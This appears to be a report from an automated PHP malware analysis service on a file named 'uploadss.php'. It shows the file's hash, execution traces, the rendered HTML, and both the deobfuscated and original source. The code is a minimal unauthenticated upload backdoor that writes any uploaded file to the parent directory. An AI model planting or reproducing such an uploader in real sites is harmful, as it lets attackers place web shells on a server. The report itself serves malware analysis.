PHP Malware Analysis
uploadss.php
md5: 5a3f6c7c8ca6e6a4329659c899266f64
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
Title
- Upload your files (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$path = "../";
$path .= basename($_FILES['uploaded_file']['name']);
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
echo "The file " . basename($_FILES['uploaded_file']['name']) . " has been uploaded";
echo $path;
} else {
echo "There was an error uploading the file, please try again!";
}
}Execution traces
data/traces/5a3f6c7c8ca6e6a4329659c899266f64_trace-1676258901.7491.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:28:47.646895]
1 0 1 0.000156 393528
1 3 0 0.000222 396728 {main} 1 /var/www/html/uploads/uploadss.php 0 0
1 3 1 0.000240 396728
0.000269 314240
TRACE END [2023-02-13 01:28:47.647039]
Generated HTML code
<html><head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"><br>
<input type="submit" value="Upload">
</form>
</body></html>Original PHP code
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>
<?PHP
if(!empty($_FILES['uploaded_file']))
{
$path = "../";
$path = $path . basename( $_FILES['uploaded_file']['name']);
if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
echo "The file ". basename( $_FILES['uploaded_file']['name']).
" has been uploaded";
echo $path;
} else{
echo "There was an error uploading the file, please try again!";
}
}